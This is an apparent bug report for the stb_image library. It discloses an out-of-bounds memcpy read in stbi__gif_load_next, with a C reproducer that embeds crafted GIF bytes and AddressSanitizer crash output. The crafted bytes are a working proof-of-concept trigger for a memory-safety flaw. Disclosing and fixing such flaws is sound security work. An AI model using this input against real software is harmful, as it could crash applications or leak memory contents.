Open JarLob opened 9 months ago
A crafted image file may trigger out of bounds memcpy read in stbi__gif_load_next. This happens because two_back points to a memory address lower than the start of the buffer out.
memcpy
stbi__gif_load_next
two_back
out
This issue may be used to leak internal memory allocation information.
To reproduce the issue:
#include <stdint.h> #define STB_IMAGE_IMPLEMENTATION #include "../stb_image.h" int main(int argc, char* argv[]) { const uint8_t data[] = {0x47,0x49,0x46,0x38,0x39,0x61,0xbd,0x00,0xdf,0x79,0xa9,0x97,0x53, 0x43,0x05,0xff,0xbe,0x21,0x00,0x30,0x03,0x01,0x00,0x21,0x00,0x2c, 0x00,0x00,0x00,0x00,0xbd,0x00,0x3f,0x71,0x07,0x00,0x05,0xff,0xbe, 0x01,0x00,0x68,0x00,0x21,0xf9,0x04,0x2c,0x0a,0x00,0x1f,0x00,0x2c, 0x00,0x00,0x00,0x00,0xbd,0x00,0x71,0x00,0x00,0x05,0xff,0xe0,0x27, 0x8e,0x64,0x68}; size_t size = sizeof(data); int x, y, z, channels; stbi_uc *img = stbi_load_gif_from_memory(data, size, NULL, &x, &y, &z, &channels, 4); stbi_image_free(img); return 0; }
AddressSanitizer:DEADLYSIGNAL ================================================================= ==34019==ERROR: AddressSanitizer: SEGV on unknown address 0x7efdf91e0ae8 (pc 0x7efe05a0ac23 bp 0x7ffd4ee08700 sp 0x7ffd4ee07ec8 T0) ==34019==The signal is caused by a READ memory access. #2 0x4e4156 in stbi__gif_load_next(stbi__context*, stbi__gif*, int*, int, unsigned char*) tests/../stb_image.h:6817:16 #3 0x4dee75 in stbi__load_gif_main(stbi__context*, int**, int*, int*, int*, int*, int) tests/../stb_image.h:6983:14 #4 0x4de8bd in stbi_load_gif_from_memory tests/../stb_image.h:1448:30
A crafted image file may trigger out of bounds
memcpy
read instbi__gif_load_next
. This happens becausetwo_back
points to a memory address lower than the start of the bufferout
.Impact
This issue may be used to leak internal memory allocation information.
Resources
To reproduce the issue: